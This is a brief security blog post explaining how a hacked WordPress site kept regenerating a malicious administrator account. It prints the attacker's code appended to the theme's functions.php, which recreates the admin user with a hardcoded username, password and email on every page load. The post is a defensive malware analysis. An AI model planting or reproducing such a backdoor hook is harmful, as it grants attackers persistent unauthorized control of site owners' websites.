In October, we wrote about how a hacker was able to re-add a malicious user to a hacked WordPress site using a database trigger. That isn’t the only way they can do that, as we found while working on cleaning up a hacked WordPress website recently. In this situation, as soon as a malicious Administrator account was deleted, a new account with the same account information would be created. The cause was code added to the end of the functions.php file for the theme currently in use on the website.
That code was as follows:
add_action( 'init', function () { $username = 'kshivvamaster'; $password = 'Admin@2020'; $email_address = 'kshivva@gmail.com'; if ( ! username_exists( $username ) ) { $user_id = wp_create_user( $username, $password, $email_address ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } ); |
The first line causes the rest of the code to run whenever WordPress loads. The rest of the code checks if the username “kshivvamaster” exists. If it doesn’t exist, it creates a new account with that username along with the specified password and email address in the code. That account is given the Administrator role.